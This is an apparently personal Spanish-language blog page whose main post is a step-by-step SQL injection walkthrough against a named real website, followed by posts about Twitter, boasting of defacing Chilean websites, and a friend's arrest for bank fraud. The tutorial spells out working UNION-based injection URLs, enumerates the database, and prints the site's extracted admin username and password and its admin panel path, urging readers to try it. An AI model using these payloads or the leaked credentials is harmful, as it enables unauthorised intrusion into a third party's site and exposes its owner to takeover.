Injectión SQL con Gothic-X

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en:

http://directinformatica.es/detalle.php?id=

Verificamos si es vulnerable haciendo una consulta con solo ponerle ( ' ) una coma, efectivamente este sitio es vulnerable a sql, ¿como sabemos? por que nos arrojo un mensaje de error el cual es el siguiente:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35

El cual nos indica que es vulnerable, bueno ahora buscaremos cuántas columnas tiene el sitio agregando lo siguiente al final de la url de la web:

( detalle.php?id=-1+union+select+0,1,2,3,4,...,

En este caso tiene 9 columnas osea quedaria de la siguienteforma.

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--

Entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma agregando al final

+from+information_schema.tables--

y reemplazando cualquiera de los numeros nos arrojo la web por table_name quedando la url de la aiguiente manera:

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--

Perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final:

+limit+1,1--

y quedaria de esta forma:

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--

Ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera.

+limit+2,1--

Hasta encontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera:

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--

Y nos dio como resultado: adm_usuario

Ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal usualmente uso esta herramienta:

http://hwagm.elhacker.net/php/sneak.php

Bueno nos dio como resultado:

61646d5f7573756172696f

Al final de la url de la injection aditaremos el final reemplazando

.tables+limit+20+1--

por

columns+where(table_name=0xaquitabalaenhex)--

y

Donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera:

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--

Y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente hasta encontrar las columnas deseadas.

En esta web encontramos las siguientes columnas:

id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user

Bién ya con esas tenemos las esenciales que son: nomb_user y pass_user.

Ahora como vemos dentro de las columnas? bueno solo reemplazamos el final despues de +from+ y agregamos el nombre de la tabla que es adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces nos quedaria de la siguiente manera nuestra url:

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--

Y nos arrojara nuestra informacion deseada que es la siguiente:

admin:matias1

Ahora solo nos falta encontrar el admin panel, en la siguiente web es:

http://directinformatica.es/cms/

Así nos logeamos y hacemos lo que tengamos que hacer, creo que este final es más fácil de hacer.

Háganlo ustedes mismos y sí que es recontra facilísimo..

Con un poco de ayudita de Gothic-X

Dr. Neox presenta su Blog

Ahora que está de moda los blogs, los concursitos huachafos como 20 Blogs y entre otros más, tengo el gusto de presentar a un amigo a quién conocí hace muy poco y también a quién no conocí aún, pero si tuvimos la gran oportunidad de compartir y participar en Élite-Peruvian y de quién me hice muy amigo hasta tener en planes la construcción de una Red Social en base a un script que modificariamos y el cuál no llego a concretarse, diría yo por falta de interés de él mismo ya que yo si tuve las ganas de levantar esa Red Social.

Bueno sin más habladurías hoy me conecto al Messenger después de dos días sin internet y llego a ver en su mensaje personal la dirección de un blog el cuál investigué un poco y así supe que era de él (Dr. Neox)

Vaya que al ver su blog, y al sólo pensar en él (Dr. Neox) me viene a la memoria que algunos días nos quedamos de madrugada sólo por joder (ownear) algunas webs chilenas y hasta llegamos a clonar la web de una Universidad Chilena que aún tengo los archivos (porsiacaso).

PD: Aún guardo capturas de pantalla de algunas webs owneadas con Dr. Neox para que sea más creible les dejo una de las tantas que hicimos:

Imagen de una web chilena que owneamos con Dr. Neox and ca0s1 a eso de las 11.40 pm cuando el festín recien empezaba.. click para ampliar la imagen..

Ahora tengo el gusto de presentar a un amigo más (Dr. Neox) con su blog personal, si quieren visitar su blog y leer sus ocurrencias pues les dejo el link de su blog AQUI.

La imagen de su Blog fué sacado por petición del mismo Dr.Neox

URL de su Blog: http://drneox.diosdelared.com

Una partecita de la presentación de su blog la cuál me gusto es en donde menciona lo siguiente:

supongo que a escribir , linkear, posicionarme en google, ganar dinero, donarlo a los niños pobres e irme de mochilero por el mundo jajajaj.
bueno bienvenidos mutantes.

Bién es todo por hoy. un post rapidito para presentar a mi amigo Dr. Neox que aún le estoy esperando a que me diga la fecha de la conferencia de Seguridad que me habló. Apropósito ya que andas con tu blog haber si te animas a twittear.

Loco Twitter

Jamás pense esta sensación que me iba a causar la famosa red social llamada Twitter, cuando en principios escuchaba del Twitter y toda esa nota soliía decir "cosa de locos" "pérdida de tiempo", pero mirame ahora ya casi llego a los 700 upadates, pues sí que estaba recontra equivocado.

En fín no tengo idea de lo que se tiene que escribir, se dicen que twitter es una unión de microblogging y red social, pero yo lo utilizo más personalmente en caso cómo este.

- Encuentro un artículo interesante y si es posible lo comparto ayá si no lo llega a leer nadie, me importa un bledo.

- Las cosas que me pasan en el trabajo, con los clientes, con mis servidores, con mis blogs y/o webs.

- A veces ántes de irme a ducharme escribo updates como éste, así cuando revise mi twitter se vé que día fué el más próximo cuando me bañé. Y me digo "ya me toca bañarme creo" jajaja.

- Cuando @vagalli se va de compras y se tira todo el billete en Metro, Tottus y otros Hiper Mercados.

- Antes de ir a comer ó cuando @vagalli no cocina y a veces cuando tengo que cocinarme sopa instantánea, y hasta a veces menciono lo que cómo.

- Hasta a veces lo utilizo como chat, dado esto recibí un mensaje cómo éste:

@ztefany: en otro pais shhhhh haha twitter no es un chat :p

- Y me olvidaba lo mas candente, menciono algunas cuando tengo ganas y cuando hay sexo.

En fín escribo lo que me da la regalada gana.. no sé si esté bien, pero es mi twitter y puedo utilizarlo cómo más me plazca así como lo és este mi blog personal.

Lo más importante del twitter lo menciono rápido que me da flojera escribir demasiado.

Al menos eh tenido la oportunidad de compartir updates con @peruinside, @Juan_Tolentino, @ztefany, @Pateador, @reynatello, @diegobardalez, @fradesin, @claroperu, @perucom, @Descuentos_Peru y con mi queridísima tía @vagalli aparte de verla a diario pues tengo que soportarle en el twitter (en mal momento le dije que creara su twitter) jajaja.

El twitter también me dió la oportundad de ganarme entradas para ir a los 25 años del rock en el parque de la exposición gracias a @perucom. Aunque me hubiera gustado comprarme la entrada que costaba 10 soles y no ir hasta Miraflores donde queda la sede de @perucom, aquí los gastos que hice.

Si me hubiera comprado la entrada:
Entrada: 10 Soles
Pasaje de Huaral a Lima al Parque de la Expo (ida y vuelta): 16 Soles
Otros cómo Chicles, Cigarritos, Cervezita: 10 Soles

Ganandome la entrada gasté:
Pasaje de Huaral a Lima a Miraflores (ida y vuelta): 27 Soles
Otros cómo Chicles, Cigarritos, Cervezita: 10 Soles

Si se dan cuenta gasté un sol más ganandome la entrada, en todo caso me hubiera comprado la entrada, pero yo me digo "El twitter es el twitter" no me importa haber pagado más, haber caminado, pero la emoción de ir a recoger una entrada que gané por twittero (jajaja).

Pues me vale mucho más, de todas maneras disfruté del concierto estuvo bravazo aunque no ví hasta el final me perdí a los grupos Amén (no importa), Los Mojarras (este si me hubiera gustado verlos) lamentablemente los carros para Huaral no salen hasta la media noche por eso fué mi retirada muy temprano el cuál si disfruté viendo a Raúl Romero y su grupito aunque no quizo cantar Magdalena (jajaja), el grupo Río (bravazo), Micky Gonzales (bravazo con sus temas), Julio Andrade (bravazo con su tamarindo) y así entre otros.

Ahora me levanté encendí la pc y me doy cuenta que me acabo de ganar el pack promocional de la película Máncora (#mancora) que concierne un poster de la peli y dos polos el cuál sorteó @agendameperu y más tarde voy a ir a recogerla hasta Lince.

Ahora cuando gastaré en pasajes pero si vale la pena "Lo gané por twittero" jajaja (si que vale la pena).

Por este motivo le conté a @vagalli y escribió su update en el twitter diciendo que me odia (jajaja) pero sé que en verdad no es así.

Sé que algunos amigos que tengo como Regor y HellXoft no atracan twittear aquí una conversación recien te que tuve con uno de ellos cuando escrbía este post:

Regor dice:
*ala causa
ca0s1 dice:
*aki ps
*toy haciendo un nuevo post
*en mi blog
Regor dice:
*man y q ganas haciendo un blog?
ca0s1 dice:
*bueno.. nada, pero mato el tiempo
Regor dice:
*q aburrido matas el tiempo
ca0s1 dice:
*jajajaja
*asi es mi vida pues brother
Regor dice:
*azoo
*q aburrido

Me gusta cómo es mi vida entre blog y blogs, web y webs, trabajo y trabajos, twitter y updates, post y posts el cuál por ningún motivo del mundo lo cambiaría.

Sólo me queda agradecer a esta red social (Twitter) que me dió la oportunidad de ganarme lo mencionado ántes y tambien de poder aprender más cosas así como tambien conocer a otras personas.

Un saludo a todos los twitters y no se olviden de hacer follow a @ca0s1

Mi amigo Jhair

Hace poco me acabo de enterar de algo bastante lamentable para mí cómo para todos mis demás amigos, diría que me cayó como una patada en el estómago cuando me lo contó The.RjR.

Capturan a hackers por desviar cuentas bancarias

ICA|Chincha. Dos sujetos fueron puestos tras las rejas en circunstancias que realizaban operaciones vía internet con la finalidad de desviar dinero de cuentas bancarias a terceras personas en agravio de clientes del Banco de Crédito y otras entidades financieras del Perú.

Fue el personal de la División de Investigación de Delitos de Alta Tecnología (DIVINDAT) de la ciudad de Lima que con apoyo de efectivos de Inteligencia de la Seincri en Chincha, lograron ubicar y capturar -con las manos en la masa- a Elvis Manuel ****** (22) y Jhair ****** (19) en una cabina de internet de nombre "Djuanc@" en el Stand Nº 191 del Centro Comercial Vega, en la segunda cuadra del Jr. Italia.

Fuente: Diario Correo

La verdad me es muy lamentable poder leer esto y más de un amigo como Jhair, ahora otro más aparte del gran Alexis Atoche (Cyberalexis) y también del gran Diego Bardalez (SDM)

Sólo me gustaría poder ir a visitar a Jhair (BuGs) ahora que ya me enteré que fué traslado al Penal de Chincha, aunque ya lo estuve planeando con HellXoft.

Un hecho lamentable, que nunca tuve la oportunidad de llegar a tanto, por retirarme a tiempo; aunque sí tuve una historia que quizá lo cuente más adelante, ese fué el gran susto que me llevé el cuál hizo que me retirara de esto.

No se olviden de hacer follow en el twitter a: @ca0s1, @diegobardalez.